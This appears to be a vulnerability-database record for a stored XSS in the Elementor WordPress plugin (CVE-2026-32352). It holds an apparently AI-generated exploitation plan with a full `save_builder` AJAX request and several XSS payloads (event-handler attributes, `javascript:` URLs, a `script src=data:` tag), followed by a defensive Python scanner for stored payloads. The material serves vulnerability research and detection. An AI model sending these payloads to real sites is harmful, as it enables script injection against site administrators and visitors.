[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0FwQAf003Rl3JmmZK5ANUyMbF92MuJFQsoXSndXDGXg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-32352","elementor-website-builder-authenticated-contributor-stored-cross-site-scripting-3","Elementor Website Builder \u003C= 3.35.5 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Elementor Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.35.5 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","elementor",null,"\u003C=3.35.5","3.35.6","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-13 00:00:00","2026-04-15 21:04:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbc51ccec-558c-4155-a309-badf99202ce1?source=api-prod",62,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32352 (Elementor Stored XSS)\n\n## 1. Vulnerability Summary\n**CVE-2026-32352** is a Stored Cross-Site Scripting (XSS) vulnerability in the **Elementor Website Builder** plugin (versions \u003C= 3.35.5, fixed in 3.35.6). The advisory attributes it to insufficient input sanitization and output escaping: widget settings saved through the Elementor editor are stored in post meta and rendered on the frontend, and at least one setting reachable by a Contributor is not neutralized on that path. The advisory does not name the affected control. The candidate fields below (custom attributes, URL controls, HTML tag selectors) are inferred from Elementor's editor data model and must be confirmed against the 3.35.5 to 3.35.6 diff before any part of this plan is treated as fact.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `elementor_ajax` (Elementor's multiplexed editor endpoint; the nonce travels in `_nonce` and the sub-requests in the JSON `actions` parameter)\n- **Internal Action**: `save_builder` (the editor's save command, dispatched through `elementor_ajax`)\n- **Vulnerable Parameter**: the `elements` (and possibly `settings`) JSON in the `save_builder` request data, persisted as the `_elementor_data` post meta.\n- **Authentication Level**: Authenticated, Contributor or higher. Contributors hold `edit_posts`, so they can open the Elementor editor on their own unpublished posts unless the role is excluded in Elementor's Role Manager.\n- **Preconditions**: Elementor is enabled for the post type being edited and the Contributor role is not excluded from the editor.\n\n## 3. Code Flow\n
1.  **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=elementor_ajax`.\n2.  **AJAX Handler**: `Core\\Common\\Modules\\Ajax\\Module::handle_ajax_request()` (in `core\u002Fcommon\u002Fmodules\u002Fajax\u002Fmodule.php`) verifies `_nonce` against the `elementor_ajax` nonce action, JSON-decodes the `actions` parameter and dispatches each entry to its registered callback.\n3.  **Command Execution**: The `save_builder` entry is routed to `Core\\Documents_Manager::ajax_save()`, which loads the document named by `editor_post_id` and checks that the current user may edit it.\n4.  **Persistence**: `Core\\Base\\Document::save()` calls `save_elements()` and `save_settings()`; the element tree is JSON-encoded and written to the `_elementor_data` post meta.\n5.  **Lack of Sanitization**: Between save and render, a Contributor-controllable setting (inferred: a custom attribute, a URL, or an HTML tag name) is not passed through `wp_kses`, `esc_attr()`, `esc_url()` or a tag whitelist.\n6.  **Rendering (Sink)**: When any user (e.g. an Administrator reviewing the post) views the page, `Frontend::get_builder_content()` loads `_elementor_data`, rebuilds the element tree and calls each widget's render method; the unescaped value lands in an attribute, a URL or a tag name in the DOM.\n\n## 4. Nonce Acquisition Strategy\nElementor's AJAX module requires the `_nonce` request parameter to validate against the `elementor_ajax` nonce action; the editor exposes the value in its JavaScript configuration.\n\n1.  **Create Test Page** (a draft, because Contributors cannot publish):\n    ```bash\n    wp post create --post_type=post --post_title=\"XSS Test\" --post_status=draft --post_author=CONTRIBUTOR_ID\n    ```\n2.  **Access Editor**: Navigate to the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n3.  **Extract Nonce via Browser**: Read it from the editor's localized configuration in the browser console (the research tooling's `browser_eval` does the same):\n    - `window.elementorCommon?.config?.ajax?.nonce`\n    - OR capture the `_nonce` field of any `elementor_ajax` request the editor sends, in the browser's network tab.\n\n## 5. Exploitation Strategy\n
Send a crafted `save_builder` request through `elementor_ajax` that stores a widget whose settings carry the payload.\n\n### Step-by-Step Plan:\n1.  **Authenticate**: Log in as a Contributor.\n2.  **Create Post**: Create (or open) a draft post owned by the Contributor to obtain `POST_ID`.\n3.  **Obtain Nonce**: Use the strategy in Section 4.\n4.  **Craft Payload**: Prepare the JSON for `save_builder`. Candidate fields: the Advanced-tab custom attributes (`_attributes`, one `key|value` pair per line), a link control's `custom_attributes` (comma-separated `key|value` pairs), or the Heading widget's tag selector (`header_size`).\n\n**HTTP Request (Example Targeting Custom Attributes):**\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body** (shown unencoded; URL-encode the `actions` value when sending):\n  ```\n  action=elementor_ajax&\n  _nonce=NONCE_VALUE&\n  editor_post_id=POST_ID&\n  actions={\"save_builder\":{\"action\":\"save_builder\",\"data\":{\"editor_post_id\":\"POST_ID\",\"status\":\"draft\",\"elements\":[{\"id\":\"id_here\",\"elType\":\"section\",\"settings\":{},\"elements\":[{\"id\":\"id_2\",\"elType\":\"column\",\"settings\":{},\"elements\":[{\"id\":\"id_3\",\"elType\":\"widget\",\"widgetType\":\"heading\",\"settings\":{\"title\":\"Hacked\",\"_attributes\":\"onclick|alert(document.domain)\\nstyle|display:block;width:100%;height:100px;background:red\"},\"elements\":[]}]}]}],\"settings\":{}}}}\n  ```\n  *(The `_attributes` field takes one `key|value` pair per line; the `\\n` above is the JSON escape for that newline.)*\n\n5.  **Trigger Execution**: Open the post as the victim. Contributors cannot publish, so the realistic victim is the Editor or Administrator who previews the pending post (`\u002F?p=POST_ID&preview=true`); once they publish it, every visitor to `\u002F?p=POST_ID` is affected.\n\n## 6. Test Data Setup\n
1.  **User**: Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Elementor Settings**: Ensure the Contributor role is not excluded from the editor (Elementor > Settings > Advanced > Role Manager). Elementor keeps the exclusion list in the `elementor_exclude_user_roles` option; confirm the option name against the installed version before relying on it:\n    ```bash\n    wp option get elementor_exclude_user_roles\n    ```\n\n## 7. Expected Results\n- The AJAX request returns `200 OK` with a JSON body containing `{\"success\":true,...}`.\n- The rendered post contains the injected attribute: `\u003Ch2 ... onclick=\"alert(document.domain)\" ...>`.\n- Clicking the heading triggers the JavaScript alert.\n- Caveat: Elementor's `Utils::parse_custom_attributes()` drops attribute keys that begin with `on`, and the `href` key, before rendering. If that filter is intact in 3.35.5 the save still succeeds and the payload is stored, but the rendered markup lacks the attribute; that outcome means the bug is elsewhere and Section 9 applies.\n\n## 8. Verification Steps\n1.  **Check Database**: Verify the payload is stored in the post meta.\n    ```bash\n    wp post meta get POST_ID _elementor_data\n    ```\n2.  **Search for Payload**:\n    ```bash\n    wp post meta get POST_ID _elementor_data | grep \"alert(document.domain)\"\n    ```\n3.  **Confirm the Sink**: Fetch the rendered post as the victim and search the HTML for the payload. A payload that is stored but filtered at render time is not a finding.\n\n## 9. Alternative Approaches\nIf custom attributes are filtered in 3.35.5, target the other Contributor-writable fields:\n- **Heading tag selector**: The Heading widget stores its tag in `header_size` (h1 to h6, div, span, p). Payload: change `settings` to `{\"title\":\"XSS\",\"header_size\":\"script src=data:,alert(1)\u002F\u002F\"}`. Recent versions run this value through `Utils::validate_html_tag()` before echoing it, so expect it to be rejected unless the diff shows otherwise.\n- Contributors lack `unfiltered_html`, so widgets that accept raw HTML are expected to pass it through `wp_kses_post()` for them. The vulnerability must be a field that is escaped for nobody, or one that bypasses that check.\n- **Video Widget**: Inject `javascript:alert(1)` into `external_url` or `vimeo_url`. These should be run through `esc_url()`; a `javascript:` scheme surviving into the rendered `src` or `href` attribute is the finding.","The Elementor Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to 3.35.5. 
Contributor-level attackers can use the Elementor editor's AJAX interface ('elementor_ajax' with a 'save_builder' action) to store widget settings that are later rendered on the frontend without adequate sanitization. The advisory does not name the affected setting; custom attributes and the Heading tag selector are the candidates the research inferred, and they remain unconfirmed against the 3.35.6 patch.","1. Authenticate as a Contributor-level user and identify a post owned by that user that can be edited with Elementor.\n2. Obtain a valid Elementor AJAX nonce from the editor's browser context ('window.elementorCommon.config.ajax.nonce') or from the '_nonce' field of any 'elementor_ajax' request visible in the browser's network tab.\n3. Construct a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with 'action' set to 'elementor_ajax', '_nonce' populated and 'editor_post_id' set to the target post.\n4. Include a 'save_builder' entry in the JSON 'actions' parameter whose data carries the element tree for a widget (e.g. 'heading') with the payload in a candidate setting such as '_attributes' (e.g. 'onmouseover|alert(document.domain)'), a link control's 'custom_attributes', or a URL field.\n5. Submit the request, then open the post as the victim (preview by the reviewing Editor or Administrator, or the published URL) to trigger the script in that user's browser.","gemini-3-flash-preview","2026-04-20 23:53:53","2026-04-20 23:55:49",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","3.35.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementor\u002Ftags\u002F3.35.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementor.3.35.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementor\u002Ftags\u002F3.35.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementor.3.35.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementor\u002Ftags"]
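
Added example for this record, not part of the vulnerability data above and not Elementor's own code: a Python scanner for the `_elementor_data` post meta that Section 8 of the research plan dumps with `wp post meta get`. It walks the nested section > column > widget tree and flags the three field classes the plan treats as candidates (custom attributes on elements and on link controls, plain-string URL settings, and raw markup in text settings), so it generalizes beyond the single heading payload in Section 5. Assumed from Elementor's data model rather than taken from the page: the `elType`/`widgetType`/`settings`/`elements` layout, the `_attributes` and link-control `custom_attributes` keys, and the `key|value` syntax; the `SAMPLE` document is constructed for the demonstration.

```python
"""Hunt for stored-XSS indicators in an Elementor `_elementor_data` post-meta document.

Added example, not Elementor's code. Assumed data model: a JSON list of elements, each with
`elType`, `id`, `settings` and nested `elements`; custom attributes are `key|value` pairs,
newline-separated in `_attributes` and comma-separated in a link control's `custom_attributes`.
"""
import json
import re
import sys

# Inline event handlers: any attribute whose name starts with "on".
EVENT_HANDLER = re.compile(r"^on[a-z]+$", re.I)
# URL schemes that execute script when the browser follows them.
SCRIPT_SCHEME = re.compile(r"^\s*(?:javascript|vbscript)\s*:", re.I)
# Markup that no control value a Contributor can set should contain.
DANGEROUS_MARKUP = re.compile(
    r"<\s*(?:script|iframe|object|embed|svg)\b|\bon[a-z]+\s*=|javascript\s*:", re.I
)
# Plain-string URL settings (the Video widget fields the plan names, plus `url`).
URL_KEYS = {"url", "external_url", "vimeo_url", "youtube_url", "dailymotion_url"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}  # followed as URLs


def walk(elements, path=()):
    """Depth-first walk of the nested element tree (section > column > widget)."""
    for el in elements:
        label = el.get("widgetType") or el.get("elType", "?")
        here = path + (f"{label}#{el.get('id', '?')}",)
        yield here, el
        yield from walk(el.get("elements") or [], here)


def parse_custom_attributes(raw, delimiter):
    """Split Elementor's `key|value` attribute list into (key, value) pairs."""
    pairs = []
    for item in raw.split(delimiter):
        if "|" not in item:
            continue  # entries without a separator carry no attribute
        key, value = item.split("|", 1)
        pairs.append((key.strip().lower(), value.strip()))
    return pairs


def check_attributes(pairs):
    """Yield a reason for each custom attribute that could execute script."""
    for key, value in pairs:
        if EVENT_HANDLER.match(key):
            yield f"event handler attribute {key!r}"
        elif key in URL_ATTRS and SCRIPT_SCHEME.match(value):
            yield f"script URL in attribute {key!r}"


def check_setting(key, value):
    """Yield reasons a single setting value looks like an injected payload."""
    if isinstance(value, list):  # repeater control: a list of item dicts
        for item in value:
            if isinstance(item, dict):
                for k, v in item.items():
                    yield from check_setting(k, v)
    elif isinstance(value, dict):
        if "url" in value:  # link control: {"url", "is_external", "custom_attributes", ...}
            if SCRIPT_SCHEME.match(str(value["url"])):
                yield "script URL in link control"
            extra = value.get("custom_attributes")
            if isinstance(extra, str) and extra:
                yield from check_attributes(parse_custom_attributes(extra, ","))
        else:
            for k, v in value.items():
                yield from check_setting(k, v)
    elif isinstance(value, str) and value:
        if key == "_attributes":  # Advanced tab > Attributes: one key|value per line
            yield from check_attributes(parse_custom_attributes(value, "\n"))
        elif key in URL_KEYS and SCRIPT_SCHEME.match(value):
            yield f"script URL in {key!r}"
        elif DANGEROUS_MARKUP.search(value):
            yield f"dangerous markup in {key!r}"


def find_indicators(elementor_data):
    """Return [(element path, setting key, reason), ...] for every suspicious setting.
    Accepts the raw JSON string from `wp post meta get POST_ID _elementor_data` or a list."""
    tree = json.loads(elementor_data) if isinstance(elementor_data, str) else elementor_data
    findings = []
    for path, el in walk(tree):
        for key, value in (el.get("settings") or {}).items():
            for reason in check_setting(key, value):
                findings.append((" > ".join(path), key, reason))
    return findings


# Constructed sample: a heading with an injected event handler, a button whose link
# carries a javascript: URL plus a second handler, and a benign text-editor widget.
SAMPLE = json.dumps([{"id": "a1", "elType": "section", "settings": {}, "elements": [
    {"id": "b2", "elType": "column", "settings": {}, "elements": [
        {"id": "c3", "elType": "widget", "widgetType": "heading", "elements": [],
         "settings": {"title": "Hello", "header_size": "h2",
                      "_attributes": "data-track|hero\nonclick|alert(document.domain)"}},
        {"id": "d4", "elType": "widget", "widgetType": "button", "elements": [],
         "settings": {"text": "Go", "link": {"url": "javascript:alert(1)", "is_external": "",
                                             "custom_attributes": "rel|noopener,onmouseover|alert(2)"}}},
        {"id": "e5", "elType": "widget", "widgetType": "text-editor", "elements": [],
         "settings": {"editor": "<p>Plain <strong>text</strong></p>"}},
    ]}]}])

if __name__ == "__main__":
    # Usage: wp post meta get POST_ID _elementor_data > dump.json && python scan.py dump.json
    raw = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for where, key, why in find_indicators(raw):
        print(f"{where}: {key}: {why}")
```

A finding means the payload is stored, which is necessary but not sufficient: the Section 7 caveat about render-time filtering still applies, and the rendered HTML has to be checked separately before calling it exploitable. On real dumps expect some noise from legitimate `text-editor` HTML; tighten `DANGEROUS_MARKUP` rather than skipping that widget, since an HTML-bearing control is exactly where a filter bypass would land.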